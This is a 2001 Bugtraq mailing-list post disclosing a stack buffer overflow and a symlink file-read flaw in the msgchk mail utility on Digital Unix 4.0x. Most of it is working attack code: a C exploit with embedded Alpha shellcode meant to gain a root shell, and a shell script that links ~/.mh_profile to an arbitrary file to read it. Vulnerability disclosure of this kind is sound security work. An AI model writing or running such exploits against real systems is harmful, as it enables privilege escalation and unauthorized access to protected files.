Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Digital Unix 4.0x msgchk multiple vulnerabilities

From: SeungHyun Seo <s1980914 () inhavision inha ac kr>
Date: Mon, 10 Sep 2001 11:54:07 +0900 (KST)


hi everyone.
there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
unix 4.0x
it's a mail utility - check for messages (only available within the
message handlin
  system, mh)
two vulnerabilities were found.

 /usr/bin/mh/msgchk is affected to buffer overflow vulnerability

 -- snip --
  $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
  AAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : 
   msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAA
  Memory fault(coredump)
 -- snip --

 exploit code is followed end of this document.
 
 Next , /usr/bin/mh/msgchk has a vulnerability that anyone read  1 line  
 of the unprivileged file on the system
 it's a old bug on redhat linux 2.0, but it also works on digital unix
4.0x
 
 exploit script is also followed end of this document too.
 
 
i didn't test it on other version of digital unix or tru64 unix , but 4.0d
if stack is excutable, then overflow bug have you get root privilege ,
bug of ~/.mh_profile file control would make you read 1 line of
unprivileged file on the system.


++ msgchkx.c

/*
 * 2001/09/05  - at the bench of windy fall         
 * /usr/bin/mh/msgchk buffer overflow exploit code by truefinder ,
seo () igrus inha ac kr
 * now we will drill /usr/bin/mh/msgchk 
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP             0x47ff041f
#define ALIGNSIZE       (4 + 1 )
#define BUFSIZE         (8000 + 211 )
#define RETADDR         0x000000011ffffaa0
#define DEFNOPSIZE      7168

char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };

static char shellcode[] =
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x94\x07\x42"      /* addq $16,60,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
        /* oh! this is ohhara's shellcode */

int 
main(int argc, char  *argv[] )
{

        char *buf , *buf_ptr;
        int bufsize , alignsize , offset ;
        int i, totalsize;
        
        bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;

        if ( argc < 1 ) {
                printf("usage : %s <bufsize> <align> <offset>\n",
argv[0]);
                exit (-1);
        }

        if (argc > 1 )
                bufsize = atoi( argv[1] );

        if ( argc > 2 )
                alignsize = atoi( argv[2] ) + ALIGNSIZE ;

        if ( argc > 3 )
                offset = atoi ( argv[3] );

        totalsize = alignsize + bufsize ;
         buf = malloc( totalsize ) ;


        memset ( buf, NULL , totalsize );

        memset ( buf, 'A', alignsize );
        buf_ptr = (char *)(buf + alignsize );

        /* default nop size is 4096 bytes */
        for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
                strcat ( buf_ptr , nop );

        strcat ( buf_ptr, shellcode );

        /* fill the block with 'A' */
        for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ;
i++ )
                strcat( buf_ptr ,"A");

        strcat ( buf_ptr , retaddr );
 
        execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL );  
}



++ msgchkx.sh

#!/bin/sh
# truefinder, seo () igrus inha ac kr
# msgchk file read vulnerability

if [ ! -f $1 ]
then 
        echo "usage : $0 <file path>"
fi
 
cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk
 



EOF



++
Seunghyun Seo , Inha university Group of Research for Unix Security
[e-mail] seo () igrus inha ac kr , [office] Inha university 4-207 , Incheon
Previous By Date Next
Previous By Thread Next

Current thread: